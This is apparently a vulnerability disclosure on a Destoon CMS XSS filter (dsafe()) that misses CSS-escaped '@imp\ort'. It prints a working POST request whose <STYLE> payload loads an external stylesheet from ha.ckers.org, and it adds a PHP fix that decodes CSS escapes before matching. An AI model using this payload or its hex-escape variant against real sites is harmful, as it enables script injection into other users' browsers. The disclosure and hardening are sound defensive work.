### Brief description:
Only tested in IE6; it popped an alert box.
### Details:
```
function dsafe($string) {
    if(is_array($string)) {
        return array_map('dsafe', $string);
    } else {
        // Strip HTML comments and CSS comments.
        $string = preg_replace("/\<\!\-\-([\s\S]*?)\-\-\>/", "", $string);
        $string = preg_replace("/\/\*([\s\S]*?)\*\//", "", $string);
        // Strip numeric character references. The check on the next line runs on
        // the already-stripped string, so it can never match.
        $string = preg_replace("/&#([a-z0-9]+)([;]*)/i", "", $string);
        if(preg_match("/&#([a-z0-9]+)([;]*)/i", $string)) return nl2br(strip_tags($string));
        // Keyword blacklist. Only 'script', 'data' and 'base' tolerate whitespace between
        // letters, and only 'expression' tolerates backslashes ([\\]*); every other keyword,
        // 'import' included, is matched literally. Note the 'confirm' replacement still
        // carries its regex delimiters, as in the shipped code.
        $match = array("/s[\s]*c[\s]*r[\s]*i[\s]*p[\s]*t/i","/d[\s]*a[\s]*t[\s]*a/i","/b[\s]*a[\s]*s[\s]*e/i","/e[\\\]*x[\\\]*p[\\\]*r[\\\]*e[\\\]*s[\\\]*s[\\\]*i[\\\]*o[\\\]*n/i","/on([a-z]{2,})([\(|\=|\s]+)/i","/about/i","/frame/i","/link/i","/import/i","/meta/i","/textarea/i","/eval/i","/alert/i","/confirm/i","/prompt/i","/cookie/i","/document/i","/newline/i","/colon/i","/\\\x/i");
        $replace = array("s<em></em>cript","da<em></em>ta","ba<em></em>se","ex<em></em>pression","o<em></em>n\\1\\2","a<em></em>bout","f<em></em>rame","l<em></em>ink","im<em></em>port","me<em></em>ta","text<em></em>area","e<em></em>val","a<em></em>lert","/con<em></em>firm/i","prom<em></em>pt","coo<em></em>kie","docu<em></em>ment","new<em></em>line","co<em></em>lon","\<em></em>x");
        // Matched keywords are split with an empty <em></em> rather than removed.
        return preg_replace($match, $replace, $string);
    }
}
```
Unescaping the PHP string literals, the patterns read as:
```
"/script/","/data/i","/base/i","/e[\]*x[\]*p[\]*r[\]*e[\]*s[\]*s[\]*i[\]*o[\]*n/i","/on([a-z]{2,})([\(|\=|\s]+)/i","/about/i","/frame/i","/link/i","/import/i","/meta/i","/textarea/i","/eval/i","/alert/i","/confirm/i","/prompt/i","/cookie/i","/document/i","/newline/i","/colon/i","/\x/i"
```
Then I noticed that `import` is not guarded against `\`. Unlike `expression`, whose pattern allows `[\]*` between every letter, `/import/i` is literal, so `imp\ort` passes through the filter untouched. A CSS parser treats `\o` as an escape for the letter `o`, so IE reads `@imp\ort` as `@import` and loads the external stylesheet. The URL-encoded POST body used:
```
action=send&typeid=-1&message%5Btouser%5D=destoon&message%5Btitle%5D=test123&message%5Bcontent%5D=<STYLE>%40imp\ort'http%3a//ha.ckers.org/xss.css'%3b</STYLE> &message%5Bcopy%5D=1&submit=+%E7%A1%AE+%E5%AE%9A+
```
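The following is an added example written for this report; it is not Destoon's code and not part of the original write-up. It isolates the two `dsafe()` patterns that matter and shows one fix: decode CSS backslash escapes before keyword matching, so the filter sees `imp\ort` the same way IE's CSS parser does. The function names `css_unescape` and `dangerous_css_keywords` are chosen here, and the hex-escaped variant at the end is a constructed input. It assumes PHP 7.2 or later with mbstring.

```php
<?php
// Added example for this report, not Destoon's code. It isolates the two
// dsafe() patterns that matter and shows one fix: decode CSS backslash
// escapes before keyword matching, so the filter sees "imp\ort" the same
// way IE's CSS parser does. Function names here are chosen for the example.

// Copied from dsafe(): 'expression' tolerates backslashes between letters
// ([\\]* in the compiled regex); 'import' is matched literally.
const ORIG_EXPRESSION_RE = '/e[\\\\]*x[\\\\]*p[\\\\]*r[\\\\]*e[\\\\]*s[\\\\]*s[\\\\]*i[\\\\]*o[\\\\]*n/i';
const ORIG_IMPORT_RE     = '/import/i';

// Decode CSS escapes the way a CSS tokenizer does (CSS Syntax Level 3):
//   "\" + 1..6 hex digits, optionally followed by one whitespace -> that code point
//   "\" + any other character                                     -> that character
// Works on bytes; a backslash before a multibyte character drops only the
// backslash. Needs mbstring for mb_chr() (PHP >= 7.2).
function css_unescape(string $css): string
{
    $decoded = preg_replace_callback(
        '/\\\\(?:([0-9a-fA-F]{1,6})\s?|(.))/s',
        function (array $m): string {
            if ($m[1] !== '') {
                $cp = (int) hexdec($m[1]);
                // NUL and out-of-range code points become U+FFFD per the spec.
                if ($cp === 0 || $cp > 0x10FFFF) {
                    $cp = 0xFFFD;
                }
                return mb_chr($cp, 'UTF-8');
            }
            return $m[2];
        },
        $css
    );
    // preg_* returns null on a PCRE error; fail closed rather than pass raw input.
    return $decoded ?? '';
}

// The hardened check: decode first, then match each keyword letter by letter
// with optional whitespace, the way dsafe() already does for 'script'.
function dangerous_css_keywords(string $s): array
{
    $decoded = css_unescape($s);
    $hits = [];
    foreach (['import', 'expression', 'script', 'data', 'base'] as $kw) {
        $re = '/' . implode('\s*', str_split($kw)) . '/i';
        if (preg_match($re, $decoded)) {
            $hits[] = $kw;
        }
    }
    return $hits;
}

// Decoded message[content] from the request in this report.
$payload = "<STYLE>@imp\\ort'http://ha.ckers.org/xss.css';</STYLE>";

printf("raw payload vs /import/i:               %d\n", preg_match(ORIG_IMPORT_RE, $payload));
printf("decoded payload vs /import/i:           %d\n", preg_match(ORIG_IMPORT_RE, css_unescape($payload)));
printf("raw 'e\\xpression' vs original pattern: %d\n", preg_match(ORIG_EXPRESSION_RE, 'e\\xpression(alert(1))'));
printf("hardened check on payload:              %s\n", implode(',', dangerous_css_keywords($payload)));
// A constructed hex-escape variant (\69 + space = 'i') that the letter-by-letter
// patterns still miss but the decoding catches.
printf("hardened check on '@\\69 mport url(x)':  %s\n", implode(',', dangerous_css_keywords('@\\69 mport url(x)')));
```

Decoding before matching is the general fix: adding `[\\]*` between the letters of every keyword, as `dsafe()` does for `expression`, would still miss hex escapes such as `\69 mport`, which the same CSS parser also reads as `import`.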
### Proof of concept:
![QQ截图20140627172542.png](https://images.seebug.org/upload/201406/27172540544c8b40b2d03baeb8ab8ed6c7f8013a.png)
According to the cheat sheet, this vector works in IE6 through IE8.